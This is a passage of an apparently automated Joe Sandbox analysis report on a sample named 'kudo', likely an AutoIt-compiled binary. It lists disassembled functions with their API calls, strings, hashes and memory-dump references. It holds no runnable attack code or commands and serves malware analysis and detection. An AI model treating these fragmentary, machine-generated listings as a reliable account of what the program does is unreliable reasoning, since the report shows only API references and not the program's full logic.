                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 1d9a52472115600fdf7e3bbc0a65a56ba8545b37b8d33219cef688aae38089f0
                                                      • Instruction ID: 8ded8458a9703bb7604ff7c0e9bb436a376cb8e98ad22b7215f7e2e10e160940
                                                      • Opcode Fuzzy Hash: 1d9a52472115600fdf7e3bbc0a65a56ba8545b37b8d33219cef688aae38089f0
                                                      • Instruction Fuzzy Hash: 2741393150026A8BCF60EF54E895AEF3764FF11304F944464FEA69B292DB30A95ECF61
                                                      Function 0085F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0083E2A0,00000010,?,Bad directive syntax error,0088F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0085F7C2
                                                      • LoadStringW.USER32(00000000,?,0083E2A0,00000010), ref: 0085F7C9
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • _wprintf.LIBCMT ref: 0085F7FC
                                                      • __swprintf.LIBCMT ref: 0085F81E
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0085F88D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1506413516-4153970271
                                                      • Opcode ID: b84edae7db79e304b17f0ecfba4b83ba3f5434d91425f4e86bdf9b8b5ca4effd
                                                      • Instruction ID: 407a61576e5e077e4f8dde66baf9cd76d6d947f75c28e12ac15f72f2e2cef6b3
                                                      • Opcode Fuzzy Hash: b84edae7db79e304b17f0ecfba4b83ba3f5434d91425f4e86bdf9b8b5ca4effd
                                                      • Instruction Fuzzy Hash: 0E218F3180021DFBDF11EF94CC0AEEE7739FF14304F040465F615A61A2EA35AA58DB51
                                                      Function 008652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                        • Part of subcall function 00807924: _memmove.LIBCMT ref: 008079AD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00865330
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00865346
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00865357
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00865369
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0086537A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: 0e1d182cc3709d90d97ea7355a3d77e3bdc40fe332c4b6bb0bc4e012091eae38
                                                      • Instruction ID: 2556c2a25e4feb8e9004716ec859fbfd60f3c937925e86c1c2a62d599361975f
                                                      • Opcode Fuzzy Hash: 0e1d182cc3709d90d97ea7355a3d77e3bdc40fe332c4b6bb0bc4e012091eae38
                                                      • Instruction Fuzzy Hash: 09119020E50169B9D760B665CC4ADFFBBBCFBA2F48F100429B521E23D1EEA01D05C6A5
                                                      Function 008646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: 6350eefc7dec8e10a15e289910c813a47cfbc5d5e315979de894fc037f83b965
                                                      • Instruction ID: e0520fb66170b321be990544c16ad36a9c07749c246ff32b66343f5877a056c4
                                                      • Opcode Fuzzy Hash: 6350eefc7dec8e10a15e289910c813a47cfbc5d5e315979de894fc037f83b965
                                                      • Instruction Fuzzy Hash: E011C071500118AFDB20BB38AC4AEEE77ACFB02711F1501B6F645D6192EF748AC18B61
                                                      Function 00864F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00864F7A
                                                        • Part of subcall function 0082049F: timeGetTime.WINMM ref: 008204A3
                                                      • Sleep.KERNEL32(0000000A), ref: 00864FA6
                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00864FCA
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00864FEC
                                                      • SetActiveWindow.USER32 ref: 0086500B
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00865019
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00865038
                                                      • Sleep.KERNEL32(000000FA), ref: 00865043
                                                      • IsWindow.USER32 ref: 0086504F
                                                      • EndDialog.USER32(00000000), ref: 00865060
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
                                                      • Instruction ID: 924ab241dd1c820d3a73b323c315edc95a44ebb998eecf373d09266aea5548d4
                                                      • Opcode Fuzzy Hash: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
                                                      • Instruction Fuzzy Hash: C7219374204605AFE7119F74ED89F2A3BB9FB54745F251034F202C22B2EB719D60DB62
                                                      Function 0086D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • CoInitialize.OLE32(00000000), ref: 0086D5EA
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0086D67D
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0086D691
                                                      • CoCreateInstance.OLE32(00892D7C,00000000,00000001,008B8C1C,?), ref: 0086D6DD
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0086D74C
                                                      • CoTaskMemFree.OLE32(?), ref: 0086D7A4
                                                      • _memset.LIBCMT ref: 0086D7E1
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0086D81D
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0086D840
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0086D847
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0086D87E
                                                      • CoUninitialize.OLE32 ref: 0086D880
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: dab3e0fa95f83ff588f135d28038869c4747c699ca1f94452ba285c2163ea541
                                                      • Instruction ID: 8210dad486e90245289c2c6f9de0d6301c8c65235ef5d3a84d91b38aed999ae0
                                                      • Opcode Fuzzy Hash: dab3e0fa95f83ff588f135d28038869c4747c699ca1f94452ba285c2163ea541
                                                      • Instruction Fuzzy Hash: F5B10D75A00219AFDB04DF68C888DAEBBB9FF48314B158469E909EB251DB30ED41CB51
                                                      Function 0085C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0085C283
                                                      • GetWindowRect.USER32(00000000,?), ref: 0085C295
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0085C2F3
                                                      • GetDlgItem.USER32(?,00000002), ref: 0085C2FE
                                                      • GetWindowRect.USER32(00000000,?), ref: 0085C310
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0085C364
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0085C372
                                                      • GetWindowRect.USER32(00000000,?), ref: 0085C383
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0085C3C6
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0085C3D4
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0085C3F1
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0085C3FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: c89e1813c1bfa1bdc0af8569c13ab75c565f4e39c0cb5d59c9f73ab352b5da38
                                                      • Instruction ID: 69c15b286a36db3f66afb2f535f5263cb27f2de7028f2ffe5519d15928f350fd
                                                      • Opcode Fuzzy Hash: c89e1813c1bfa1bdc0af8569c13ab75c565f4e39c0cb5d59c9f73ab352b5da38
                                                      • Instruction Fuzzy Hash: 6D513E71B00205AFDB18CFADDD89AAEBBB6FF98311F148129FA15D6291D7709D448B10
                                                      Function 008021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • GetSysColor.USER32(0000000F), ref: 008021D3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: cc3437fbb1081cd8f77a3bafbbc4b7b4d9ec62c5474307fa5696a6a342abf1a9
                                                      • Instruction ID: e228c4ee9728979e75b223ab65a947b01103a9f04edbcbfb34dfb8606d3580f4
                                                      • Opcode Fuzzy Hash: cc3437fbb1081cd8f77a3bafbbc4b7b4d9ec62c5474307fa5696a6a342abf1a9
                                                      • Instruction Fuzzy Hash: 89418E35100140AADB619F6CDC8CBB97B66FB46321F244265FE65CA1E2C7718C82DB61
                                                      Function 0086A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0086A90B
                                                      • GetDriveTypeW.KERNEL32(00000061,008B89A0,00000061), ref: 0086A9D5
                                                      • _wcscpy.LIBCMT ref: 0086A9FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 60049f072ad16dc40a1c87112cc75a6cc0866f54ad00e0feb8d05638d0ec9d1b
                                                      • Instruction ID: d06ad1587b2dfc4f72d67c2f365ce5c4ba02bbc86c10a5196b79826976a354c1
                                                      • Opcode Fuzzy Hash: 60049f072ad16dc40a1c87112cc75a6cc0866f54ad00e0feb8d05638d0ec9d1b
                                                      • Instruction Fuzzy Hash: E7518D311083119FC704EF18D892AAFBBA5FF84344F55482DF5A6E72A2DB319949CA53
                                                      Function 00809837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 6716949ecd26a049a6ef53a3210133e78d2686edabf21dc087afe0abcedf0de4
                                                      • Instruction ID: 2d3cb70a62d1b56c893845242136405ad45504da493a7bb4b2eef34211b142e4
                                                      • Opcode Fuzzy Hash: 6716949ecd26a049a6ef53a3210133e78d2686edabf21dc087afe0abcedf0de4
                                                      • Instruction Fuzzy Hash: 4841B271904209AFDB24AF38DC46A7A73E8FF45304F20447EE589D6393EA35A941CB91
                                                      Function 00887152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0088716A
                                                      • CreateMenu.USER32 ref: 00887185
                                                      • SetMenu.USER32(?,00000000), ref: 00887194
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887221
                                                      • IsMenu.USER32(?), ref: 00887237
                                                      • CreatePopupMenu.USER32 ref: 00887241
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0088726E
                                                      • DrawMenuBar.USER32 ref: 00887276
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 7c344b8e6dedd9936999ad254c1b7b4875776a6ec3ab69a9975961caae0fe11e
                                                      • Instruction ID: 4460715b8e1eefb9529657dfc603eacbd611d28f67e5f24cfb3d0c8caf4f644c
                                                      • Opcode Fuzzy Hash: 7c344b8e6dedd9936999ad254c1b7b4875776a6ec3ab69a9975961caae0fe11e
                                                      • Instruction Fuzzy Hash: FF411B75A01209EFDB20EFA4D988E9A7BB5FF49350F244029FA56D7361D731A910CF90
                                                      Function 008874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 0088755E
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00887565
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00887578
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00887580
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0088758B
                                                      • DeleteDC.GDI32(00000000), ref: 00887594
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0088759E
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008875B2
                                                      • DestroyWindow.USER32(?), ref: 008875BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 7a9b0b18de13a91b3a7bf2bee21a4c239ace71e2fb9d60404c5b16b223f64148
                                                      • Instruction ID: 8b90590a892c37161ad562225a503597ed64d48c26d416b7365ea69b73587477
                                                      • Opcode Fuzzy Hash: 7a9b0b18de13a91b3a7bf2bee21a4c239ace71e2fb9d60404c5b16b223f64148
                                                      • Instruction Fuzzy Hash: 10316A32104215ABDF12AF68DC09FEA3B79FF49320F210224FA15E61A1D731D821DBA4
                                                      Function 00826E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00826E3E
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      • __gmtime64_s.LIBCMT ref: 00826ED7
                                                      • __gmtime64_s.LIBCMT ref: 00826F0D
                                                      • __gmtime64_s.LIBCMT ref: 00826F2A
                                                      • __allrem.LIBCMT ref: 00826F80
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00826F9C
